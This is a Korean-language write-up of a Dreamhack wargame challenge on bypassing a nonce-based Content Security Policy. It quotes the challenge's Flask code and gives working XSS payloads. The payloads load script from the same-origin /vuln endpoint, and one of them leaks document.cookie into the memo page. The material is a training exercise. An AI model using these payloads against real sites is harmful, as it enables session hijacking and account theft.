[Dreamhack] Level 2: CSP Bypass

1. 문제

https://dreamhack.io/wargame/challenges/435

CSP Bypass

2. 해결 과정

코드 중 add_header 부분에서 응답값에 CSP를 추가하는 것을 확인할 수 있다. 

• default-src 'self': 기본적으로 동일 출처(d 같은 도메인)의 리소스만 로드할 수 있습니다.
• img-src https://dreamhack.io: 이미지는 https://dreamhack.io 도메인에서만 로드할 수 있습니다.
• style-src 'self' 'unsafe-inline': CSS는 동일 출처에서 로드할 수 있으며, 인라인 스타일도 허용합니다('unsafe-inline').
• script-src 'self' 'nonce-{nonce}': 자바스크립트는 동일 출처에서 로드할 수 있으며, nonce 속성이 일치하는 스크립트만 실행할 수 있습니다. 
• nonce = os.urandom(16).hex(): nonce 값을 갱신합니다. os.urandom(16)은 16바이트의 랜덤 바이트를 생성하고, .hex()은 이를 16진수 문자열로 변환합니다. 이 새로운 nonce 값은 다음 요청에 사용됩니다.

@app.after_request
def add_header(response):
    global nonce
    response.headers[
        "Content-Security-Policy"
    ] = f"default-src 'self'; img-src https://dreamhack.io; style-src 'self' 'unsafe-inline'; script-src 'self' 'nonce-{nonce}'"
    nonce = os.urandom(16).hex()
    return response

 

 

vuln과 memo 엔드포인트는 이용자의 입력값을 페이지에 출력한다.

memo 는 render_template 함수를 사용해 memo.html 을 출력한다. render_template 함수는 전달된 템플릿 변수를 기록할 때 HTML 엔티티코드로 변환해 저장하기 때문에 XSS 취약점이 발생하지 않는다.

그러나 vuln 은 이용자가 입력한 값을 페이지에 그대로 출력하기 때문에 XSS 취약점이 발생할 수 있다.

@app.route("/vuln")
def vuln():
    param = request.args.get("param", "")
    return param

...

@app.route("/memo")
def memo():
    global memo_text
    text = request.args.get("memo", "")
    memo_text += text + "\n"
    return render_template("memo.html", memo=memo_text, nonce=nonce)

 

자바스크립트는 동일 출처에서 로드할 수 있다고 되어 있으므로 현재 경로를 포함시켜 alert(1)을 발생시킬 수 있다.

<script src="./vuln?param=alert(document.cookie)"></script>

 

스크립트 코드가 실행된 것을 확인할 수 있다. 

이를 변형하여 쿠키값을 memo페이지에 출력되도록 할 것이다. 

 

<script src="/vuln?param=location.href='/memo?memo='%2bdocument.cookie"></script>

 

-> %2b는 URL 인코딩된 + 문자이다.

URL에서 + 문자는 공백을 의미하는데, 여기서 %2b를 사용한 이유는 URL이 디코딩되는 과정에서 +가 공백으로 변환되는 것을 방지하기 위해서이다. 

 

성공